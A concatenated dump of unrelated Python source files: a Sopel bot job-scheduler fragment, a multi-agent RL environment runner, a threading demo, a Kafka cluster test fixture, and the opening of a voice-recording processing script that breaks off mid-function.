The expected attributes are the ones set by decorators from the
:mod:`sopel.plugin` module.
"""
return {
'plugin': getattr(handler, 'plugin_name', None),
'label': getattr(handler, 'rule_label', None),
'threaded': getattr(handler, 'thread', True),
'doc': inspect.getdoc(handler),
}
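    # A hypothetical handler sketch showing the attribute names consumed here
    # and in from_callable() below; `check_feeds` and `settings` are
    # illustrative only (in Sopel these attributes are normally set by
    # decorators from sopel.plugin):
    #
    #     def check_feeds(manager):
    #         """Poll the feeds for new entries."""
    #
    #     check_feeds.interval = [300]
    #     check_feeds.plugin_name = 'feeds'
    #     check_feeds.rule_label = 'check_feeds'
    #     check_feeds.thread = False
    #
    #     job = Job.from_callable(settings, check_feeds)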
@classmethod
def from_callable(cls, settings, handler):
"""Instantiate a Job from the bot's ``settings`` and a ``handler``.
:param settings: bot's settings
:type settings: :class:`sopel.config.Config`
:param handler: callable used to instantiate a new job
:type handler: :term:`function`
"""
kwargs = cls.kwargs_from_callable(handler)
return cls(
set(handler.interval),
handler=handler,
**kwargs)
def __init__(self,
intervals,
plugin=None,
label=None,
handler=None,
threaded=True,
doc=None):
# scheduling
now = time.time()
self.intervals = set(intervals)
"""Set of intervals at which to execute the job."""
self.next_times = dict(
(interval, now + interval)
for interval in self.intervals
)
"""Tracking of when to execute the job next time."""
# meta
self._plugin_name = plugin
self._label = label
self._doc = doc
# execution
self._handler = handler
self._threaded = bool(threaded)
self.is_running = threading.Event()
"""Running flag: it tells if the job is running or not.
This flag is set and cleared automatically by the :meth:`execute`
method. It is also set and cleared when the job is used with the
``with`` statement::
with job:
# you do something before executing the job
# this ensures that the job is marked as "running"
.. note::
When set manually or with the ``with`` statement, the
:meth:`execute` method won't clear this attribute itself.
"""
def __enter__(self):
self.is_running.set()
def __exit__(self, exc_type, exc_value, traceback):
self.next(time.time())
self.is_running.clear()
def __str__(self):
"""Return a string representation of the Job object.
Example result::
<Job periodic_check [5s]>
<Job periodic_check [60s, 3600s]>
Example when the job is tied to a plugin::
<Job reminder.remind_check [2s]>
"""
try:
label = self.get_job_label()
except RuntimeError:
label = '(unknown)'
plugin_name = self.get_plugin_name()
if plugin_name:
label = '%s.%s' % (plugin_name, label)
return "<Job %s [%s]>" % (
label,
', '.join('%ss' % i for i in sorted(self.intervals)),
)
def get_plugin_name(self):
"""Get the job's plugin name.
:rtype: str
The job's plugin name will be used in various places to select,
register, unregister, and manipulate the job based on its plugin, which
is referenced by its name.
"""
return self._plugin_name
def get_job_label(self):
"""Get the job's label.
:rtype: str
A job can have a label, which can identify the job by string, the same
way rules can be. This label can be used to manipulate or display the
job's information in a more human-readable way. Note that the label has
no effect on the job's execution.
"""
if self._label:
return self._label
if self._handler is not None and self._handler.__name__:
return self._handler.__name__
raise RuntimeError('Undefined job label')
def get_doc(self):
"""Get the job's documentation.
:rtype: str
A job's documentation is a short text that can be displayed to a user.
"""
return self._doc
def is_threaded(self):
"""Tell if the job's execution should be in a thread.
:return: ``True`` if the execution should be in a thread,
``False`` otherwise
:rtype: bool
"""
return self._threaded
def is_ready_to_run(self, at_time):
"""Check if this job is (or will be) ready to run at the given time.
:param int at_time: Timestamp to check, in seconds
:return: ``True`` if the job is (or will be) ready to run, ``False``
otherwise
:rtype: bool
"""
return not self.is_running.is_set() and any(
(next_time - at_time) <= 0
for next_time in self.next_times.values()
)
def next(self, current_time):
"""Update :attr:`next_times`, assuming it executed at ``current_time``.
:param int current_time: timestamp of the current time
:return: a modified job object
"""
for interval, last_time in list(self.next_times.items()):
if last_time >= current_time:
# no need to update this interval
continue
# if last time + interval is in the future, it's used
# else, try to run it asap
self.next_times[interval] = max(last_time + interval, current_time)
return self
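    # Worked example with hypothetical numbers: with next_times == {300: 1000},
    # next(1100) schedules the next run at max(1000 + 300, 1100) == 1300 (the
    # regular cadence), while next(1500) clamps the overdue slot to
    # max(1000 + 300, 1500) == 1500, i.e. the job runs again as soon as possible.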
def execute(self, manager):
"""Execute the job's handler and return its result.
:param object manager: used as argument to the job's handler
:return: the return value from the handler's execution
This method executes the job's handler. It doesn't change its running
state, as this must be done by the caller::
with job: # mark as running
# before execution
job.execute(manager)
# after execution
"""
return self._handler(manager)
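if __name__ == '__main__':
    # Minimal usage sketch: wires a Job and a Scheduler together with a
    # throwaway manager. The _DemoManager class, the _ping handler and the
    # 2-second interval are illustrative assumptions only; real callers such
    # as sopel.bot.Sopel provide their own manager.
    class _DemoManager:
        def on_job_error(self, scheduler, job, error):
            LOGGER.error('job %s failed: %s', job, error)
        def on_scheduler_error(self, scheduler, error):
            LOGGER.error('scheduler error: %s', error)
    def _ping(manager):
        print('ping from', manager)
    demo_scheduler = Scheduler(_DemoManager())
    demo_scheduler.register(Job({2}, plugin='demo', label='ping', handler=_ping))
    demo_scheduler.start()
    try:
        time.sleep(5)  # let the job fire a couple of times
    finally:
        demo_scheduler.stop()  # ask the scheduler to stop ...
        demo_scheduler.join()  # ... and wait until it actually does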
|
envs_runner_cen_condi.py
|
import numpy as np
import torch
import IPython
from multiprocessing import Process, Pipe
from IPython.core.debugger import set_trace
def worker(child, env):
"""
    Worker function which interacts with the environment over a remote pipe connection.
"""
try:
while True:
# wait cmd sent by parent
cmd, data = child.recv()
if cmd == 'step':
actions, obs, reward, terminate, valid = env.step(data)
for idx, v in enumerate(valid):
accu_id_rewards[idx] = accu_id_rewards[idx] + reward[idx] if not last_id_valid[idx] else reward[idx]
last_id_valid = valid
accu_joint_rewards = accu_joint_rewards + sum(reward)/env.n_agent if not last_joint_valid else sum(reward)/env.n_agent
last_joint_valid = max(valid)
# sent experience back
child.send((last_obs,
actions,
accu_id_rewards,
accu_joint_rewards,
obs,
terminate,
valid,
max(valid)))
last_obs = obs
R += sum(reward)/env.n_agent
elif cmd == 'reset':
last_obs = env.reset()
last_h = None # single network for cen control
last_id_action = [-1] * env.n_agent
last_id_valid = [1] * env.n_agent
last_joint_valid = 1
accu_id_rewards = [0.0] * env.n_agent
accu_joint_rewards = 0.0
R = 0.0
child.send((last_obs, last_h, last_id_action, last_id_valid))
elif cmd == 'close':
child.close()
break
else:
                raise NotImplementedError
except KeyboardInterrupt:
print('EnvRunner worker: caught keyboard interrupt')
except Exception as e:
print('EnvRunner worker: uncaught worker exception')
raise
class EnvsRunner(object):
"""
    Environment runner which runs multiple environments in parallel in subprocesses
and communicates with them via pipe
"""
def __init__(self,
env,
memory,
n_env,
h_explore,
get_actions):
"""
Parameters
----------
env : gym.env
            A macro-action-based gym environment.
memory : ReplayBuffer
            An instance of the ReplayBuffer class.
n_env : int
The number of envs running in parallel.
h_explore : bool
            Whether to use a history-based policy for rollouts.
        get_actions : Python function
            A function for getting macro-actions.
"""
# func for getting next action via current policy nn
self.get_actions = get_actions
# create connections via Pipe
self.parents, self.children = [list(i) for i in zip(*[Pipe() for _ in range(n_env)])]
# create multip processor with multiple envs
self.envs = [Process(target=worker, args=(child, env)) for child in self.children]
# replay buffer
self.memory = memory
self.hidden_states = [None] * env.n_agent
self.h_explore = h_explore
        self.episodes = [[] for _ in range(n_env)]  # one independent episode cache per env
# trigger each processor
for env in self.envs:
env.daemon = True
env.start()
for child in self.children:
child.close()
def step(self):
n_episode_done = 0
for idx, parent in enumerate(self.parents):
# get next action
if self.h_explore:
self.actions[idx], self.h_states[idx] = self.get_actions(self.last_obses[idx], self.h_states[idx], self.actions[idx], self.last_valids[idx])
else:
self.actions[idx], self.hidden_states[idx] = self.get_actions(self.last_obses[idx], self.h_states[idx], self.actions[idx], self.last_valids[idx])
# send cmd to trigger env step
parent.send(("step", self.actions[idx]))
# collect envs' returns
for idx, parent in enumerate(self.parents):
# env_return is (last_obs, a, acc_id_r, acc_j_r, obs, t, v)
env_return = parent.recv()
env_return = self.exp_to_tensor(env_return)
self.episodes[idx].append(env_return)
self.last_obses[idx] = env_return[4]
self.actions[idx] = env_return[1]
self.last_valids[idx] = env_return[6]
# if episode is done, add it to memory buffer
if env_return[-3]:
n_episode_done += 1
self.memory.scenario_cache += self.episodes[idx]
self.memory.flush_scenario_cache()
# when episode is done, immediately start a new one
parent.send(("reset", None))
self.last_obses[idx], self.h_states[idx], self.actions[idx], self.last_valids[idx] = parent.recv()
self.last_obses[idx] = self.obs_to_tensor(self.last_obses[idx])
self.actions[idx] = self.action_to_tensor(self.actions[idx])
self.last_valids[idx] = self.valid_to_tensor(self.last_valids[idx])
self.episodes[idx] = []
return n_episode_done
def reset(self):
# send cmd to reset envs
for parent in self.parents:
parent.send(("reset", None))
self.last_obses, self.h_states, self.actions, self.last_valids = [list(i) for i in zip(*[parent.recv() for parent in self.parents])]
self.last_obses = [self.obs_to_tensor(obs) for obs in self.last_obses]
self.actions = [self.action_to_tensor(a) for a in self.actions]
self.last_valids = [self.valid_to_tensor(id_v) for id_v in self.last_valids]
def close(self):
[parent.send(('close', None)) for parent in self.parents]
[parent.close() for parent in self.parents]
[env.terminate() for env in self.envs]
[env.join() for env in self.envs]
def obs_to_tensor(self, obs):
return [torch.from_numpy(o).float() for o in obs]
def valid_to_tensor(self,valid):
return [torch.tensor(v, dtype=torch.uint8).view(1,-1) for v in valid]
def action_to_tensor(self,action):
return [torch.tensor(a).view(1,1) for a in action]
def exp_to_tensor(self, exp):
last_obs = [torch.from_numpy(o).float() for o in exp[0]]
a = [torch.tensor(a).view(1,1) for a in exp[1]]
acc_id_r = [torch.tensor(r).float().view(1,-1) for r in exp[2]]
acc_joint_r = torch.tensor(exp[3]).float().view(1,-1)
obs = [torch.from_numpy(o).float() for o in exp[4]]
t = torch.tensor(exp[5]).float().view(1,-1)
id_v = [torch.tensor(v, dtype=torch.uint8).view(1,-1) for v in exp[6]]
joint_v = torch.tensor(exp[7], dtype=torch.uint8).view(1,-1)
return (last_obs, a, acc_id_r, acc_joint_r, obs, t, id_v, joint_v)
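# Minimal driving sketch: MacroActionEnv, ReplayBuffer and select_actions are
# hypothetical placeholders for the project's own environment, replay buffer
# and action-selection function; the loop only illustrates the intended
# reset -> step -> close cycle:
#
#     runner = EnvsRunner(MacroActionEnv(), ReplayBuffer(), n_env=4,
#                         h_explore=False, get_actions=select_actions)
#     runner.reset()
#     episodes_done = 0
#     while episodes_done < 100:
#         episodes_done += runner.step()
#     runner.close()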
|
01_demo.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import threading
from time import sleep, ctime
def sing():
for i in range(3):
print("正在唱歌...%d" % i)
sleep(1)
def dance():
for i in range(3):
print("正在跳舞...%d" % i)
sleep(1)
if __name__ == '__main__':
    print('---Start---:%s' % ctime())
t1 = threading.Thread(target=sing)
t2 = threading.Thread(target=dance)
t1.start()
t2.start()
    # sleep(5)  # Disable this line and see whether the program exits immediately.
    # print('---End---:%s' % ctime())
while True:
length = len(threading.enumerate())
        print('Number of threads currently running: %d' % length)
if length <= 1:
break
sleep(0.5)
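    # Equivalent wait using join(), shown only as a sketch: instead of polling
    # threading.enumerate(), the main thread can block on each worker directly:
    #
    #     t1.join()
    #     t2.join()
    #     print('---End---:%s' % ctime())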
|
cluster.py
|
import asyncio
import shutil
import tempfile
import threading
import warnings
from asyncio import AbstractEventLoop
from collections import Counter
from pathlib import Path
from typing import List, Optional, Union
from cluster_fixture import ssl_helper
from cluster_fixture.base import DEFAULT_KAFKA_VERSION, KafkaVersion, get_loop
from cluster_fixture.kafka import Endpoint, KafkaInstance, PlaintextEndpoint, SaslMechanism
from cluster_fixture.zookeeper import ZookeeperInstance
class ConfigurationWarning(UserWarning):
pass
class Cluster:
def __init__(
self,
cluster_id: int = 1,
cluster_size: int = 1,
kafka_version: KafkaVersion = DEFAULT_KAFKA_VERSION,
working_directory: Optional[Path] = None,
endpoints: Optional[List[Endpoint]] = None,
sasl_mechanisms: Optional[List[SaslMechanism]] = None,
keep_temporary_files: bool = False,
ssl_client_auth_enabled: bool = False,
):
"""
This class will create and manage all resources required to start up and monitor a Kafka cluster.
>>> from cluster_fixture import Cluster
>>> with Cluster() as cluster:
... print(cluster.get_bootstrap_servers("PLAINTEXT"))
['PLAINTEXT://localhost:9092']
:param cluster_id: Used for naming the control thread and working directory for this cluster.
:param cluster_size: Used to set how many brokers should be started.
:param kafka_version: The kafka version the brokers should use.
:param working_directory: The working directory containing all configuration files for Kafka and Zookeeper.
Defaults to a temporary directory if `None`.
        :param endpoints: The list of endpoints each broker within the cluster should have. Can all use the same
ports, free ports will be determined during startup. Defaults to just a single plaintext
endpoint if `None`. The first endpoint in the list will be used for inter-broker
communication.
:param sasl_mechanisms: The list of sasl mechanisms the broker shall support. Defaults to `["PLAIN"]` if `None`.
:param keep_temporary_files: Determines whether to keep or delete the working directory after shutdown.
:param ssl_client_auth_enabled: Determines if ssl endpoints require clients to have their own valid
certificates. Default is `False`.
"""
self._cluster_size = cluster_size
self._components: List[Union[ZookeeperInstance, KafkaInstance]] = []
self._exception: Optional[Exception] = None
self._kafka_version = kafka_version
self._keep_temporary_files = keep_temporary_files
self._sasl_mechanisms = sasl_mechanisms
self._shutdown = threading.Event()
self._thread: Optional[threading.Thread] = None
self.brokers: List[KafkaInstance] = []
self.cluster_id = cluster_id
self.shutdown_complete = threading.Event()
self.startup_complete = threading.Event()
self.zk_instance: Optional[ZookeeperInstance] = None
if working_directory is None:
working_directory = Path(tempfile.mkdtemp(prefix="kafka_fixture_")) / f"cluster{cluster_id:02}"
self._working_directory = working_directory
self._working_directory.mkdir(parents=True, exist_ok=True)
if endpoints is None:
endpoints = [PlaintextEndpoint()]
self._endpoints: List[Endpoint] = endpoints
# make sure _endpoint names are unique
count = Counter(ep.listener_name for ep in self._endpoints)
duplicates = [key for key, value in count.items() if value > 1]
if duplicates:
raise ValueError(
"Listener names must be unique, the following listeners are defined more than once: "
+ ", ".join(duplicates)
)
# make sure endpoints don't use same ports
if len({ep.port for ep in self._endpoints}) != len(self._endpoints):
first_port = self._endpoints[0].port
self._endpoints = [ep.with_port(first_port + i) for i, ep in enumerate(self._endpoints)]
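        # Worked example (hypothetical): two endpoints both configured on port
        # 9092 are remapped here to 9092 and 9093; actually free ports are
        # still determined later during broker startup.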
self._ssl_enabled: bool = any(ep.ssl_enabled for ep in self._endpoints)
self._ssl_client_auth_enabled: bool = ssl_client_auth_enabled
self._ssl_keystore_location: Optional[Path] = None
self._ssl_cert_location: Optional[Path] = None
self._ssl_key_location: Optional[Path] = None
self._ssl_store_passphrase: str = "hunter2"
if self._ssl_enabled:
self._generate_certificates()
if self._ssl_client_auth_enabled and not self._ssl_enabled:
warnings.warn("Client auth enabled, but no SSL endpoint configured!", ConfigurationWarning)
def _generate_certificates(self):
# Since both client and server are on localhost, we can just use the same certificates for everything
keystore = ssl_helper.cert_gen()
self._ssl_keystore_location = self._working_directory / "keystore.pkcs12"
ssl_helper.dump_keystore(self._ssl_keystore_location, keystore, self._ssl_store_passphrase)
self._ssl_key_location = self._working_directory / "server_key.pem"
self._ssl_cert_location = self._working_directory / "server_cert.pem"
ssl_helper.dump_cert_data(self._ssl_key_location, self._ssl_cert_location, keystore)
@property
def ssl_enabled(self) -> bool:
return self._ssl_enabled
@property
def ssl_client_auth_enabled(self) -> bool:
return self._ssl_client_auth_enabled
@property
def ssl_store_passphrase(self) -> str:
return self._ssl_store_passphrase
@property
def ssl_server_cert_location(self) -> Path:
if self._ssl_cert_location is None:
raise RuntimeError("Server certificate hasn't been generated! Did you configure an SSL endpoint?")
return self._ssl_cert_location
@property
def ssl_server_keystore_location(self) -> Path:
if self._ssl_keystore_location is None:
raise RuntimeError("Server keystore hasn't been generated! Did you configure an SSL endpoint?")
return self._ssl_keystore_location
@property
def ssl_server_truststore_location(self) -> Path:
if self._ssl_keystore_location is None:
raise RuntimeError("Server truststore hasn't been generated! Did you configure an SSL endpoint?")
return self._ssl_keystore_location
@property
def ssl_client_keystore_location(self) -> Path:
if self._ssl_keystore_location is None:
raise RuntimeError("Client keystore hasn't been generated! Did you configure an SSL endpoint?")
return self._ssl_keystore_location
@property
def ssl_client_truststore_location(self) -> Path:
if self._ssl_keystore_location is None:
raise RuntimeError("Client truststore hasn't been generated! Did you configure an SSL endpoint?")
return self._ssl_keystore_location
@property
def ssl_client_key_location(self) -> Path:
if self._ssl_key_location is None:
raise RuntimeError("Client key hasn't been generated! Did you configure an SSL endpoint?")
return self._ssl_key_location
@property
def ssl_client_cert_location(self) -> Path:
if self._ssl_cert_location is None:
raise RuntimeError("Client cert hasn't been generated! Did you configure an SSL endpoint?")
return self._ssl_cert_location
def start(self) -> None:
"""
Start the cluster after it has been created or stopped.
If this cluster is used as a contextmanager, this function will automatically be called.
When restarting a stopped cluster, the ports are only guaranteed to stay the same if nothing
else has bound to them in the meantime.
>>> cluster = Cluster()
>>> try:
... cluster.start()
... print(cluster.get_bootstrap_servers("PLAINTEXT"))
... finally:
... cluster.stop()
['PLAINTEXT://localhost:9092']
>>> # try-finally construct omitted here for brevity.
>>> cluster.start()
>>> print(cluster.get_bootstrap_servers("PLAINTEXT"))
['PLAINTEXT://localhost:9092']
>>> cluster.close()
:raises RuntimeError: When called on a cluster that is running.
"""
self.start_nowait()
self.startup_complete.wait(timeout=300)
if self._exception:
raise self._exception
def start_nowait(self) -> None:
"""
Non-blocking version of :meth:`start`. Use :attr:`startup_complete` to determine if the cluster has completed
startup.
"""
if self._thread is not None:
raise RuntimeError("Cluster already running or not properly closed!")
self.startup_complete.clear()
self.shutdown_complete.clear()
self._shutdown.clear()
self._components.clear()
self.brokers.clear()
self.zk_instance = None
self._exception = None
self._thread = threading.Thread(name=f"Cluster{self.cluster_id:02}EventLoop", target=self._run)
self._thread.start()
def _run(self) -> None:
loop: Optional[AbstractEventLoop] = None
try:
loop = get_loop()
self.zk_instance = ZookeeperInstance(
kafka_version=self._kafka_version, working_directory=self._working_directory / "zookeeper", loop=loop
)
self.brokers.extend(
KafkaInstance(
cluster=self,
broker_id=broker_id,
zookeeper_instance=self.zk_instance,
cluster_size=self._cluster_size,
kafka_version=self._kafka_version,
working_directory=self._working_directory / f"broker{broker_id:02}",
loop=loop,
endpoints=self._endpoints,
sasl_mechanisms=self._sasl_mechanisms,
)
for broker_id in range(self._cluster_size)
)
self._components.extend(self.brokers)
self._components.append(self.zk_instance)
all_done = asyncio.gather(*(comp.start_async() for comp in self._components), return_exceptions=True)
results = loop.run_until_complete(all_done)
for result in results:
if isinstance(result, Exception):
self._exception = result
self._shutdown.set()
break
self.startup_complete.set()
loop.run_until_complete(self._check_shutdown())
except Exception as e:
self._exception = e
self._shutdown.set()
self.startup_complete.set()
finally:
if loop is not None:
loop.close()
async def _check_shutdown(self) -> None:
while not self._shutdown.is_set():
await asyncio.sleep(0.1)
results = await asyncio.gather(*(comp.close_async() for comp in self._components), return_exceptions=True)
for result in results:
if isinstance(result, Exception):
self._exception = result
break
self.shutdown_complete.set()
def stop(self) -> None:
"""
Stop a running cluster, does nothing if the cluster is inactive.
See :meth:`start` for usage example.
"""
if self._thread is None:
# got stopped before it even started, nothing to do
return
self._shutdown.set()
self._thread.join()
self._thread = None
if self._exception:
exc = self._exception
self._exception = None
raise exc
def close(self) -> None:
"""
Close the cluster. Basically does the same as :meth:`stop` but will also remove the working directory if
requested.
"""
self.stop()
if not self._keep_temporary_files and self._working_directory.exists():
shutil.rmtree(self._working_directory)
def get_bootstrap_servers(self, listener_name: str = "PLAINTEXT") -> List[str]:
"""
        Retrieve the endpoint urls of the first **up to three** brokers for the given `listener_name`.
Keep in mind that this is not necessarily the same as the security protocol.
For more information about `security_protocol` vs `listener_name` see :class:`Endpoint`.
        :param listener_name: The name of the listener whose endpoints shall be retrieved.
:return: A list of endpoint urls in the form `security_protocol://host:port`
e.g. `["PLAINTEXT://localhost:9092"]`.
:raises RuntimeError: If the cluster is not running.
:raises KeyError: If there is no listener with the given name on one or more brokers.
"""
self.assert_running()
return [broker.get_endpoint_url(listener_name) for broker in self.brokers[:3]]
def get_endpoints(self, listener_name: str = "PLAINTEXT") -> List[Endpoint]:
"""
Retrieve all brokers' :class:`Endpoint` objects for the given `listener_name`.
Keep in mind that the `listener_name` is not necessarily the same as the security protocol.
For more information about `security_protocol` vs `listener_name` see :class:`Endpoint`.
        :param listener_name: The name of the listener whose endpoints shall be retrieved.
:return: A list of :class:`Endpoint` with the given `listener_name`.
:raises RuntimeError: If the cluster is not running.
:raises KeyError: If there is no listener with the given name on one or more brokers.
"""
self.assert_running()
return [broker.get_endpoint(listener_name) for broker in self.brokers]
@property
def zookeeper_url(self) -> str:
"""
Retrieve the url of the zookeeper instance that's running for this cluster.
:return: The zookeeper url in the form `host:port`, e.g. `"localhost:8081"`.
:raises RuntimeError: If the cluster is not running.
"""
self.assert_running()
assert self.zk_instance is not None
return self.zk_instance.url
def assert_running(self) -> None:
"""
Make sure the cluster is running.
:raises RuntimeError: If the cluster is not running.
"""
if self._thread is None:
raise RuntimeError("Cluster hasn't been started yet!")
if not self.startup_complete.is_set():
raise RuntimeError("Cluster startup is not complete!")
if self.shutdown_complete.is_set():
raise RuntimeError("Cluster is shut down!")
if not self._thread.is_alive():
raise RuntimeError("Cluster thread has died!")
def __enter__(self) -> "Cluster":
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
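# --- Usage sketch (illustrative only) ---
# A minimal sketch of driving the fixture without the context manager. It assumes the
# constructor defaults shown in the docstring above; the cluster id, size and the
# plaintext-only endpoint list below are arbitrary example values.
def _example_cluster_usage() -> None:
    cluster = Cluster(cluster_id=1, cluster_size=3, endpoints=[PlaintextEndpoint()])
    try:
        cluster.start()
        print(cluster.get_bootstrap_servers("PLAINTEXT"))  # e.g. ['PLAINTEXT://localhost:9092', ...]
        print(cluster.zookeeper_url)                       # e.g. 'localhost:2181'
    finally:
        cluster.close()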
|
_v5_proc_voice2wav.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# COPYRIGHT (C) 2014-2020 Mitsuo KONDOU.
# This software is released under the MIT License.
# https://github.com/konsan1101
# Thank you for keeping the rules.
import sys
import os
import time
import datetime
import codecs
import glob
import queue
import threading
import subprocess
# Interface
qCtrl_control_speech = 'temp/control_speech.txt'
# qLog, qFunc common routines
import _v5__qLog
qLog = _v5__qLog.qLog_class()
import _v5__qFunc
qFunc = _v5__qFunc.qFunc_class()
qPLATFORM = qFunc.getValue('qPLATFORM' )
qRUNATTR = qFunc.getValue('qRUNATTR' )
qHOSTNAME = qFunc.getValue('qHOSTNAME' )
qUSERNAME = qFunc.getValue('qUSERNAME' )
qPath_pictures = qFunc.getValue('qPath_pictures' )
qPath_videos = qFunc.getValue('qPath_videos' )
qPath_cache = qFunc.getValue('qPath_cache' )
qPath_sounds = qFunc.getValue('qPath_sounds' )
qPath_icons = qFunc.getValue('qPath_icons' )
qPath_fonts = qFunc.getValue('qPath_fonts' )
qPath_log = qFunc.getValue('qPath_log' )
qPath_work = qFunc.getValue('qPath_work' )
qPath_rec = qFunc.getValue('qPath_rec' )
qPath_s_ctrl = qFunc.getValue('qPath_s_ctrl' )
qPath_s_inp = qFunc.getValue('qPath_s_inp' )
qPath_s_wav = qFunc.getValue('qPath_s_wav' )
qPath_s_jul = qFunc.getValue('qPath_s_jul' )
qPath_s_STT = qFunc.getValue('qPath_s_STT' )
qPath_s_TTS = qFunc.getValue('qPath_s_TTS' )
qPath_s_TRA = qFunc.getValue('qPath_s_TRA' )
qPath_s_play = qFunc.getValue('qPath_s_play' )
qPath_v_ctrl = qFunc.getValue('qPath_v_ctrl' )
qPath_v_inp = qFunc.getValue('qPath_v_inp' )
qPath_v_jpg = qFunc.getValue('qPath_v_jpg' )
qPath_v_detect = qFunc.getValue('qPath_v_detect' )
qPath_v_cv = qFunc.getValue('qPath_v_cv' )
qPath_v_photo = qFunc.getValue('qPath_v_photo' )
qPath_v_msg = qFunc.getValue('qPath_v_msg' )
qPath_d_ctrl = qFunc.getValue('qPath_d_ctrl' )
qPath_d_play = qFunc.getValue('qPath_d_play' )
qPath_d_prtscn = qFunc.getValue('qPath_d_prtscn' )
qPath_d_movie = qFunc.getValue('qPath_d_movie' )
qPath_d_upload = qFunc.getValue('qPath_d_upload' )
qBusy_dev_cpu = qFunc.getValue('qBusy_dev_cpu' )
qBusy_dev_com = qFunc.getValue('qBusy_dev_com' )
qBusy_dev_mic = qFunc.getValue('qBusy_dev_mic' )
qBusy_dev_spk = qFunc.getValue('qBusy_dev_spk' )
qBusy_dev_cam = qFunc.getValue('qBusy_dev_cam' )
qBusy_dev_dsp = qFunc.getValue('qBusy_dev_dsp' )
qBusy_dev_scn = qFunc.getValue('qBusy_dev_scn' )
qBusy_s_ctrl = qFunc.getValue('qBusy_s_ctrl' )
qBusy_s_inp = qFunc.getValue('qBusy_s_inp' )
qBusy_s_wav = qFunc.getValue('qBusy_s_wav' )
qBusy_s_STT = qFunc.getValue('qBusy_s_STT' )
qBusy_s_TTS = qFunc.getValue('qBusy_s_TTS' )
qBusy_s_TRA = qFunc.getValue('qBusy_s_TRA' )
qBusy_s_play = qFunc.getValue('qBusy_s_play' )
qBusy_v_ctrl = qFunc.getValue('qBusy_v_ctrl' )
qBusy_v_inp = qFunc.getValue('qBusy_v_inp' )
qBusy_v_QR = qFunc.getValue('qBusy_v_QR' )
qBusy_v_jpg = qFunc.getValue('qBusy_v_jpg' )
qBusy_v_CV = qFunc.getValue('qBusy_v_CV' )
qBusy_d_ctrl = qFunc.getValue('qBusy_d_ctrl' )
qBusy_d_inp = qFunc.getValue('qBusy_d_inp' )
qBusy_d_QR = qFunc.getValue('qBusy_d_QR' )
qBusy_d_rec = qFunc.getValue('qBusy_d_rec' )
qBusy_d_play = qFunc.getValue('qBusy_d_play' )
qBusy_d_browser = qFunc.getValue('qBusy_d_browser')
qBusy_d_upload = qFunc.getValue('qBusy_d_upload' )
qRdy__s_force = qFunc.getValue('qRdy__s_force' )
qRdy__s_fproc = qFunc.getValue('qRdy__s_fproc' )
qRdy__s_sendkey = qFunc.getValue('qRdy__s_sendkey')
qRdy__v_reader = qFunc.getValue('qRdy__v_reader' )
qRdy__v_sendkey = qFunc.getValue('qRdy__v_sendkey')
qRdy__d_reader = qFunc.getValue('qRdy__d_reader' )
qRdy__d_sendkey = qFunc.getValue('qRdy__d_sendkey')
class proc_voice2wav:
def __init__(self, name='thread', id='0', runMode='debug',
micDev='0', micType='bluetooth', micGuide='on', micLevel='777', ):
self.path = qPath_s_inp
self.runMode = runMode
self.micDev = micDev
self.micType = micType
self.micGuide = micGuide
self.micLevel = micLevel
self.minSize = 10000
self.maxSize = 384000
self.breakFlag = threading.Event()
self.breakFlag.clear()
self.name = name
self.id = id
self.proc_id = '{0:10s}'.format(name).replace(' ', '_')
self.proc_id = self.proc_id[:-2] + '_' + str(id)
if (runMode == 'debug'):
self.logDisp = True
else:
self.logDisp = False
qLog.log('info', self.proc_id, 'init', display=self.logDisp, )
self.proc_s = None
self.proc_r = None
self.proc_main = None
self.proc_beat = None
self.proc_last = None
self.proc_step = '0'
self.proc_seq = 0
def __del__(self, ):
qLog.log('info', self.proc_id, 'bye!', display=self.logDisp, )
def begin(self, ):
#qLog.log('info', self.proc_id, 'start')
self.fileRun = qPath_work + self.proc_id + '.run'
self.fileRdy = qPath_work + self.proc_id + '.rdy'
self.fileBsy = qPath_work + self.proc_id + '.bsy'
qFunc.statusSet(self.fileRun, False)
qFunc.statusSet(self.fileRdy, False)
qFunc.statusSet(self.fileBsy, False)
self.proc_s = queue.Queue()
self.proc_r = queue.Queue()
self.proc_main = threading.Thread(target=self.main_proc, args=(self.proc_s, self.proc_r, ))
self.proc_beat = time.time()
self.proc_last = time.time()
self.proc_step = '0'
self.proc_seq = 0
self.proc_main.setDaemon(True)
self.proc_main.start()
def abort(self, waitMax=5, ):
qLog.log('info', self.proc_id, 'stop', display=self.logDisp, )
self.breakFlag.set()
chktime = time.time()
while (not self.proc_beat is None) and ((time.time() - chktime) < waitMax):
time.sleep(0.25)
chktime = time.time()
while (os.path.exists(self.fileRun)) and ((time.time() - chktime) < waitMax):
time.sleep(0.25)
def put(self, data, ):
self.proc_s.put(data)
return True
def checkGet(self, waitMax=5, ):
chktime = time.time()
while (self.proc_r.qsize() == 0) and ((time.time() - chktime) < waitMax):
time.sleep(0.10)
data = self.get()
return data
def get(self, ):
if (self.proc_r.qsize() == 0):
return ['', '']
data = self.proc_r.get()
self.proc_r.task_done()
return data
def main_proc(self, cn_r, cn_s, ):
        # Log
qLog.log('info', self.proc_id, 'start', display=self.logDisp, )
qFunc.statusSet(self.fileRun, True)
self.proc_beat = time.time()
        # Initial settings
self.proc_step = '1'
        # Wait loop
self.proc_step = '5'
check_file = ''
check_size = 0
check_time = time.time()
while (self.proc_step == '5'):
self.proc_beat = time.time()
            # Check for stop request
if (self.breakFlag.is_set()):
self.breakFlag.clear()
self.proc_step = '9'
break
            # Get from queue
if (cn_r.qsize() > 0):
cn_r_get = cn_r.get()
inp_name = cn_r_get[0]
inp_value = cn_r_get[1]
cn_r.task_done()
else:
inp_name = ''
inp_value = ''
if (cn_r.qsize() > 1) or (cn_s.qsize() > 20):
qLog.log('warning', self.proc_id, 'queue overflow warning!, ' + str(cn_r.qsize()) + ', ' + str(cn_s.qsize()))
            # Set ready status
if (qFunc.statusCheck(self.fileRdy) == False):
qFunc.statusSet(self.fileRdy, True)
            # Status response
if (inp_name.lower() == '_status_'):
out_name = inp_name
out_value = '_ready_'
cn_s.put([out_name, out_value])
            # Processing
path = self.path
path_files = glob.glob(path + '*')
if (len(path_files) > 0):
#try:
if (True):
base_byte = 0
file_count = 0
for f in path_files:
file_count += 1
                        # Check for stop request
if (self.breakFlag.is_set()):
self.breakFlag.clear()
self.proc_step = '9'
break
proc_file = f.replace('\\', '/')
                        # Check whether the file is still being written
if (os.name != 'nt'):
#if (len(path_files) == file_count):
                            # File size
proc_size = 0
try:
rb = open(proc_file, 'rb')
